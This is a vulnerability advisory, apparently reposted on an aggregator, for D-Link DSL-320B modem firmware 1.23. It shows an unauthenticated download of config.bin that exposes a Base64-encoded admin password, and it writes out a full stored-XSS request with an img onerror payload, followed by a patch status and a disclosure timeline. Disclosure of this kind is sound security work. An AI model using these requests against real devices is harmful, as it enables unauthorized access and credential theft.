Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29377
HistoryMay 06, 2013 - 12:00 a.m.

Multiple Vulnerabilities in D-Link DSL-320B

2013-05-0600:00:00
vulners.com
11

Device: DSL-320B

Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010

Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

============ Vulnerability Overview: ============

  • Access to the Config file without authentication => full authentication bypass possible! :): (1)

192.168.178.111/config.bin

===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====

=> sysPassword is Base64 encoded

Request:
http://192.168.178.111/home/home_parent.xgi?&amp;set/bwlist/enable=1&amp;set/bwlist/bw_status=0&amp;set/bwlist/entry:1/bw_flag=0&amp;set/bwlist/entry:1/hostname=&#37;22&#37;3E&#37;3Cimg&#37;20src=&#37;220&#37;22&#37;20onerror=alert&#40;1&#41;&#37;3E&amp;set/bwlist/entry:1/weekday=6&amp;set/bwlist/entry:1/begintime=00:00&amp;set/bwlist/entry:1/endtime=23:59&amp;set/bwlist/entry:1/store=1&amp;set/bwlist/apply=1

Again you are able to place this XSS without authentication.

============ Solution ============

Update to firmware version 1.25:

(1) - fixed
(2) - not fixed but authentication needed
(3) - not fixed

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

17.03.2012 - discovered vulnerabilities
17.03.2013 - informed vendor about the vulnerabilities
25.04.2013 - tested beta version from vendor
30.04.2013 - vendor releases patch
06.05.2013 - public disclosure

===================== Advisory end =====================